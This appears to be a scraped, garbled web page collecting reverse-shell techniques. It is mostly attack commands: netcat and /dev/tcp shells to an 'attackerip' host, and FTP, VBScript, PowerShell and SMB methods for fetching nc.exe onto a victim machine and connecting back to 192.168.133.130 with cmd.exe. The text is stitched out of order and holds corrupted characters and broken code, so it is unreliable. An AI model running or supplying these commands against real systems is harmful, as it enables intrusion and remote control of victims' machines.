The following command should be run on the server. One of the simplest forms of reverse shell is an xterm session. P = r.exec( as String)įrom an Anonymous reader of PentestMoneky () Rm -f /tmp/p mknod /tmp/p p & nc attackerip 4444 0/tmp/p 2>&1 Java
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this: Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. All the credits goes to the authors of this techniques, the original sources are:Ġ/dev/tcp/attackerip/4444 sh &196 2>&196
Netcat reverse shell without e install#
File Transfer with ftp Hacker Tab1: nc -nvlp 4444 Hacker Tab2: //Install python-pyftpdlib to run ftp sever apt-get install python-pyftpdlib python -m pyftpdlib -p 21 Victim: echo open 192.168.133.130 21> ftp.txt echo anonymous> ftp.txt echo anonymous> ftp.txt echo bin > ftp.txt echo GET nc.exe > ftp.txt echo bye > ftp.txt ftp -s:ftp.txt nc.exe 192.168.133.130 4444 -e cmd.exe Transfer shell with VBS echo strUrl = (0) > wget.vbs echo StrFile = (1) > wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 > wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 > wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 > wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 > wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts > wget.vbs echo Err.Clear > wget.vbs echo Set http = Nothing > wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") > wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") > wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") > wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") > wget.vbs echo http.Open "GET", strURL, False > wget.vbs echo http.Send > wget.vbs echo varByteArray = http.ResponseBody > wget.vbs echo Set http = Nothing > wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") > wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) > wget.vbs echo strData = "" > wget.vbs echo strBuffer = "" > wget.vbs echo For lngCounter = 0 to UBound(varByteArray) > wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) > wget.vbs echo Next > wget.vbs echo ts.Close > wget.vbs cscript wget.vbs nc.exe nc.exe 192.168.133.130 4444 -e cmd.exe PowershellĮcho $webclient = New-Object >wget.ps1 echo $url = "" >wget.ps1 echo $file = "nc1.exe" >wget.ps1 echo $webclient.DownloadFile($url,$file) >wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 nc1.exe 192.168.133.130 4444 -e cmd.exe SMB Hacker Tab1: nc -nvlp 4444 Hacker Tab2: Victim: //net view \\192.168.133.130 //dir \\192.168.133.130\sahi copy \\192.168.133.130\sahi\nc.exe nc.exe nc.exe 192.168.133.130 4444 -e cmd or \\192.168.133.130\sahi\evil.exe Powershell One liner Reverse Shell powershell $client = New-Object ("192.168.133.130",4444) $stream = $client.GetStream() ]$bytes = 0.65535|% $client.This is a collection of some useful techniques to obtain a reverse shell on Linux.
0 kommentar(er)
